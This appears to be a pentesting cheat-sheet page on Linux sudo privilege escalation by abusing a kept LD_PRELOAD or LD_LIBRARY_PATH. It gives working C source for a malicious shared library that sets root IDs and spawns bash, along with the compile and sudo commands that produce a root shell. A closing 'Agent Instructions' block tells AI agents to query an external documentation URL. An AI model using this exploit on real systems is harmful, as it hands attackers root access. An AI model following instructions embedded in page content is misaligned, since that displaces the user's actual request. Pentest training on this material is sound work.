# Sudo Privilege Escalation by Overriding Shared Library

### [LD\_PRELOAD, LD\_LIBRARY\_PATH Overwriting](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-privilege-escalation-by-overriding-shared-library/#ld_preload%2C-ld_library_path-overwriting) <a href="#ld_preload-2c-ld_library_path-overwriting" id="ld_preload-2c-ld_library_path-overwriting"></a>

#### [Investigation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-privilege-escalation-by-overriding-shared-library/#investigation) <a href="#investigation" id="investigation"></a>

Check sudo commands.

```sh
sudo -l
Copied!
```

The below is the output example.

```bash
env_keep+=LD_PRELOAD

(ALL : ALL) NOPASSWD: somecmd
Copied!
```

If we find the sudo command keeps **LD\_PRELOAD** environment, we can overwrite this variable to load our custome shared object and escalate the privileges.

Also, we can replace the **LD\_PRELOAD** with **LD\_LIBRARY\_PATH**.

By the way, to list shared libraries required by the executable, use `ldd` command.

```sh
ldd somecmd
Copied!
```

#### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-privilege-escalation-by-overriding-shared-library/#exploitation) <a href="#exploitation" id="exploitation"></a>

First off, create **exploit.c** under **/tmp** .

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void inject()__attribute__((constructor));

void inject() {
	unsetenv("LD_PRELOAD");
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
Copied!
```

* The **"constructor"** attribute is a special type of function attribute in GCC. It tells the compiler to automatically call the function before the main function.

Now compile the c program to shared object.

```bash
# -fPIC: Generate Position Independent Code.
# -shared: Generate a shared library.
# -o: Output shared object.
gcc  -fPIC -shared -o exploit.so exploit.c
Copied!
```

We can execute command with setting the shared library to **LD\_PRELOAD** variable then spawn the root shell.

```bash
sudo LD_PRELOAD=/tmp/exploit.so somecmd
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/sudo-privilege-escalation-by-overriding-shared-library.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.